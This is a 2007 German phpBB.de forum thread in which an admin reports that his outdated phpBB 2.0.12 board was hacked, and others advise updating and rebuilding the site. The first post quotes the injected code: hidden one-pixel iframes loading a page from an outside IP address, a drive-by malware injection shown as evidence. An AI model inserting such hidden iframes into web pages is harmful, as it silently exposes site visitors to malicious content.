phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

Neuer Wurm? phpBB 2.0.12-Forum platt...

https://www.phpbb.de/community/viewtopic.php?t=152807

Seite 1 von 1

Neuer Wurm? phpBB 2.0.12-Forum platt...

Verfasst: 08.08.2007 22:22
von newfox
Seit heute vormittag ist mein Forum platt. Hatte phpBB 2.0.12 am laufen. Updates waren immer problematisch, weil ich schon so viel an dem Teil herumgestrickt hatte.

Nun ist das Forum platt, es hat sich auf der Startseite irgendein Script eingenistet:

Code: Alles auswählen

src=http://81.29.241.236/acc2/vera/index.php?id=290 width=1 
height=1></iframe><!--0--><iframe
src=http://81.29.241.236/acc2/vera/index.php?id=290 width=1 
height=1></iframe><!--0--><iframe
src=http://81.29.241.236/acc<br />
Hat jemand damit schon mal Berührung gehabt?

Sollte ich jetzt lieber auf phpBB 3.0 umsteigen?

Gruß
newfox

Verfasst: 08.08.2007 22:31
von PhilippK
Wenn du mit phpBB 2.0.12 arbeitest, glaube ich nicht, dass es sich um einen "neuen" Wurm handelt.

Ich würde auf jeden Fall auf irgendwas aktuelles Updaten. Ob 2.0.22 oder 3.0 RC 4 ist da relativ egal.

Gruß, Philipp

Verfasst: 09.08.2007 08:14
von Boecki91
Heute, am 8. August 2007, erfolgte (wieder einmal) ein Hacker-Angriff auf das Forum-Vietnam.de
Wenn es öftersvorkommt, frage ich dich bist du NIE auf die Idee gekommen die Software zu Updaten?

Sorry aber so kann ich nur sagen:
Selbst schuld.

Verfasst: 09.08.2007 09:50
von larsneo
/me fragt sich, ob du wirklich glaubst, dass es für ein versionsstand von februar 2005 noch einen neuen wurm gibt... :roll:

ich würde *dringend* empfehlen, die gesamte präsenz neu aufzusetzen, da unter umständen neben dem sichtbaren hack auch schon untermieter ala irc-bots, spamengines etc. platziert wurden - und für deren payload kannst du als verantwortlicher unter umständen in die haftung genommen werden.

darüberhinaus solltest du die 'overall' security des webspace nach möglichkeit optimieren um in zukunft angriffe zumindestens zu erschweren - phpsecinfo gibt da z.b. einen ganz guten überblick. als update version würde ich die aktuelle stable, d.h. die 2.0.22 empfehlen.

Verfasst: 09.08.2007 20:43
von newfox
Vielen Dank erst einmal für die Tipps.

Natürlich bin ich schon mal "auf die Idee gekommen", zu updaten. Das Problem sind nur die vielen Änderungen die gegenüber dem Standard-phpBB eingepflegt wurden. Alles manuell zu ändern, war mir einfach zu zeitintensiv.

Ich möchte möglichst umfangreiche Funktionen haben. Gab es da nicht mal irgendwelche "Plus"-Versionen, die schon jede Menge MODs mit drin hatten?

Gruß
newfox

Verfasst: 09.08.2007 21:00
von Stefane
nabend,

ja, diese "Plus-Version" gibt es, aber wenn dir dein Forum so gefällt, wie du es jetzt hast, dann update doch auf 2.0.22. Ein Admin muss nun auch mal für die Sicherheit seines Forums ein wenig Zeit investieren. So einfach ist dann der Job eines Admins doch nicht, was? ;-)

Wenn du dir das nicht alleine zutraust, das Board zu updaten, dann schreib doch dein Begehren in die Jobbörse. Da meldet sich sicherlich jemand.

MfG

Stefane
Alle Zeiten sind UTC+02:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de